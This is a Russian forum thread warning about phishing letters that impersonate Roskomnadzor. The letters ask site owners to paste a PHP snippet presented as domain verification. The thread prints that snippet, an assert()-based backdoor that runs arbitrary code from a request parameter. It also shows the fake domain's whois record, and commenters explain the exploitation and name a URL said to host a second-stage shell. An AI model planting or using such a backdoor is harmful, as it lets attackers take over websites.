От имени роскомнадзора совершаются деяния

0

1

Ъ: от имени Роскомнадзора пишутся письма, в котором идет требование вставить в код сайта.

< ?php
/*Подтверждение доменного имени www.yandex.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

Собственно, насколько технически возможно специально обученным людям отследить, *кто* зарегал домен и спросить у него - зачем? В whois ничего нет, что позволяет определить, кто это:

Domain Name:ROSKOMNADZOR.ORG
Domain ID: D177149039-LROR
Creation Date: 2015-08-19T23:12:27Z
Updated Date: 2015-08-19T23:41:38Z
Registry Expiry Date: 2016-08-19T23:12:27Z
Sponsoring Registrar:TLD Registrar Solutions Ltd. (R2011-LROR)
Sponsoring Registrar IANA ID: 1564
WHOIS Server:
Referral URL:
Domain Status: clientTransferProhibited — http://www.icann.org/epp#clientTransferProhibited
Domain Status: serverTransferProhibited — http://www.icann.org/epp#serverTransferProhibited
Registrant ID:INTE12jyrqple3k6
Registrant Name:Domain Admin
Registrant Organization:Whois Privacy Corp.
Registrant Street: Ocean Centre, Montagu Foreshore
Registrant Street: East Bay Street
Registrant City:Nassau
Registrant State/Province:New Providence
Registrant Postal Code:0000
Registrant Country:BS
Registrant Phone:+44.7546458118
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:roskomnadzor.org-owner@customers.whoisprivacycorp.com
Admin ID:INTEq6ty9gr6q279
Admin Name:Domain Admin
Admin Organization:Whois Privacy Corp.
Admin Street: Ocean Centre, Montagu Foreshore
Admin Street: East Bay Street
Admin City:Nassau
Admin State/Province:New Providence
Admin Postal Code:0000
Admin Country:BS
Admin Phone:+44.7546458118
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email:roskomnadzor.org-admin@customers.whoisprivacycorp.com
Tech ID:INTEjff1e5kav771
Tech Name:Domain Admin
Tech Organization:Whois Privacy Corp.
Tech Street: Ocean Centre, Montagu Foreshore
Tech Street: East Bay Street
Tech City:Nassau
Tech State/Province:New Providence
Tech Postal Code:0000
Tech Country:BS
Tech Phone:+44.7546458118
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email:roskomnadzor.org-tech@customers.whoisprivacycorp.com
Name Server:NS-CANADA.TOPDNS.COM
Name Server:NS-USA.TOPDNS.COM
Name Server:NS-UK.TOPDNS.COM
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned

По мотивам http://habrahabr.ru/post/265513/ и http://habrahabr.ru/post/265515/

Ссылка

←	аудиофилия vs разум

Посоветуйте клаву

→

Оригинально, нечего сказать.

Llevellyn ☆
(27.08.15 17:12:46 MSK)

Ссылка

Тонко.

ncrmnt ★★★★★
(27.08.15 17:19:15 MSK)

Ссылка

На такое повестись могут только пхпшники. На них и ориентировано

Siado ★★★★★
(27.08.15 17:28:23 MSK)

Ссылка

Развод заключается в том, что пользователю предлагают создать файл с на первый взгляд безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят код, который будет указан в переменной roskomnadzor.

Объясните для тех кто не знает ПХП: как они планируют заполнить эту переменную?

ymuv ★★★★
(27.08.15 17:29:30 MSK)

Ответ на: комментарий от ymuv 27.08.15 17:29:30 MSK

Так она в запросе. ?roskomnadzor=very_evil_code;

x3al ★★★★★
(27.08.15 17:34:17 MSK)

Ссылка

Ответ на: комментарий от ymuv 27.08.15 17:29:30 MSK

Через get-запрос, указав в параметре код. Ассерт код исполняет.

bk_ ★★
(27.08.15 17:34:17 MSK) автор топика

Ссылка

Дети роскомнадзора

torvn77 ★★★★★
(27.08.15 17:37:32 MSK)

Ссылка

Удивлен, что так долго никто этим не промышлял. Хотя может просто не всплывало раньше.

Ghostwolf ★★★★★
(27.08.15 17:49:26 MSK)

Ответ на: комментарий от Ghostwolf 27.08.15 17:49:26 MSK

Такой хренью обычно просто сразу шелку аплоадят. А тут — социальная инженерия.

deep-purple ★★★★★
(27.08.15 18:19:33 MSK)

Ответ на: комментарий от deep-purple 27.08.15 18:19:33 MSK

Так установки щелки, наверняка, будет вторым этапом.

bk_ ★★
(27.08.15 18:26:43 MSK) автор топика

Ответ на: комментарий от bk_ 27.08.15 18:26:43 MSK

Так вот она http://ewgames.gq/123.txt уже на зараженном. И с него уже тащит в остальные. Эпидемия кароче. Уже началась.

deep-purple ★★★★★
(27.08.15 18:28:27 MSK)

Ссылка

На такое повестись могут только глупцы. Сам код выглядит весьма специфически, подобные вставки уже много лет встречаются на разных сайтиках, адрес организации не корректный, да и уведомления от Роскомнадзора выглядят не так, как письмецо незадачливых горе-злоумышленников...

lucentcode ★★★★★
(27.08.15 18:49:11 MSK)

Ответ на: комментарий от lucentcode 27.08.15 18:49:11 MSK

Дураков хватает наверняка.

~~Kaschenko~~ ☆
(27.08.15 18:55:02 MSK)

Лол, даже адрес «roskomnadzor.org» левый. Интересно, повёлся ли кто-то?

Deleted
(27.08.15 20:03:35 MSK)

Надеюсь, что в $_REQUEST[roskomnadzor] прилетает код, который к чертям собачьим сносит весь сайт и базу. Это было бы очень правильно, ибо те, кто такой код добавят, не пользуются ни системами контроля версий, ни бэкапами

WARNING ★★★★
(27.08.15 20:14:30 MSK)
Последнее исправление: WARNING 27.08.15 20:15:45 MSK (всего исправлений: 1)

Ответ на: комментарий от Deleted 27.08.15 20:03:35 MSK

Ну идиотов, которые не понимают, что у госконторы очень вряд ли будет домен а зоне для некоммерческих организаций таки немало

~~Valkeru~~ ★★★★
(27.08.15 20:16:42 MSK)

Ответ на: комментарий от Valkeru 27.08.15 20:16:42 MSK

А разве роскомнадзор коммерческая организация?

torvn77 ★★★★★
(27.08.15 20:21:07 MSK)
Последнее исправление: torvn77 27.08.15 20:21:22 MSK (всего исправлений: 1)

Ответ на: комментарий от torvn77 27.08.15 20:21:07 MSK

Гос. организация скорее всего расположилась бы в *.gov.ru

Deleted
(27.08.15 20:46:53 MSK)

Ответ на: комментарий от Deleted 27.08.15 20:46:53 MSK

Гос. организация скорее всего расположилась бы в *.gov.ru

Он и редиректит на http://rkn.gov.ru/ , кто-то может повестись на это.

~~Flame4All~~
(28.08.15 10:17:52 MSK)

Ответ на: комментарий от WARNING 27.08.15 20:14:30 MSK

те, кто такой код добавят, не пользуются ни системами контроля версий, ни бэкапами

Ни головой.

Xellos ★★★★★
(28.08.15 10:21:36 MSK)

Ссылка

Ответ на: комментарий от Flame4All 28.08.15 10:17:52 MSK

редиректит

Вася Пупкин тоже вполне способен заредиректить pupkin.org на president.gov.ru

Deleted
(28.08.15 14:00:42 MSK)

Ответ на: комментарий от Deleted 28.08.15 14:00:42 MSK

Спасибо, кэп.

~~Flame4All~~
(28.08.15 16:35:10 MSK)

Ответ на: комментарий от Flame4All 28.08.15 16:35:10 MSK

Flame4All
Он и редиректит на http://rkn.gov.ru/ , кто-то может повестись на это.

Deleted
(28.08.15 16:36:30 MSK)

Ответ на: комментарий от Kaschenko 27.08.15 18:55:02 MSK

К сожалению, скорее всего вы правы.

lucentcode ★★★★★
(28.08.15 18:59:16 MSK)

Ссылка

Ответ на: комментарий от Deleted 28.08.15 16:36:30 MSK

Что сказать-то хотел?

~~Flame4All~~
(28.08.15 19:13:29 MSK)

Ссылка

Ответ на: комментарий от lucentcode 27.08.15 18:49:11 MSK

На такое повестись могут только глупцы.

Целевая аудитория скорее пользователи всяких вордпресов, жумлы и тому подобного, кто в этом вашем пхп ничего не понимают, а просто используют готовые цмски. Таких очень много.

~~Flame4All~~
(28.08.15 19:18:24 MSK)

Ответ на: комментарий от Flame4All 28.08.15 19:18:24 MSK

Думаю, тем кто не понимает что делает подобный код, лучше самому скрипты своего сайта не изменять, а вместо этого найти того, кто немного лучше разбирается в вопросах веб-разработки, и попросить его глянуть на подобное «уведомление».

lucentcode ★★★★★
(28.08.15 22:34:58 MSK)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	аудиофилия vs разум

Talks

Посоветуйте клаву

→

Похожие темы